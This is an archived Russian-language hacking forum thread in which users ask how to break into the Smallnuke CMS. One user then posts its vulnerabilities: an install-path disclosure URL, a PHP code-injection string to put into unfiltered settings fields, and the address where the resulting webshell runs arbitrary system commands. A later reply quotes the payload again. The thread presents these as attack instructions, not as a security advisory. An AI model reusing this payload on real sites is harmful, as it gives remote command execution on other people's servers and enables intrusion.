PDA

Просмотр полной версии : Взлом Smallnuke 2. Возможно ли?


OGNIS
23.02.2006, 21:47
Привет!
Кто то знает как поломать Smallnuke (www.smallnuke.com) ?

SanyaX
23.02.2006, 22:16
Эх я давно об этом мечтаю думаю кто-нибудь выложит уязвимости.

zEr00nE
16.09.2006, 15:01
1) Раскрытие установочного пути:
index.php?go=Search&modname=test&query=E1it3 team
2) Возможность закачать webshell. Поля настройки никак не фильтруются, вводим в любое поле:
";if ($_GET['e13']) {system($_GET['e13']);exit;}$test="
и получаем шелл по адресу
index.php?e13=команда
По словам автора лучше помещать в ключевые слова сайта, это конечно же разумно.
3) Пароли пишутся в открытом виде.

SanyaX
16.09.2006, 16:05
2) Возможность закачать webshell. Поля настройки никак не фильтруются, вводим в любое поле:
";if ($_GET['e13']) {system($_GET['e13']);exit;}$test="
и получаем шелл по адресу
index.php?e13=команда
Воще бесполезная вигня. Если ты админ то только ты и сможешь замутить а так не как :(.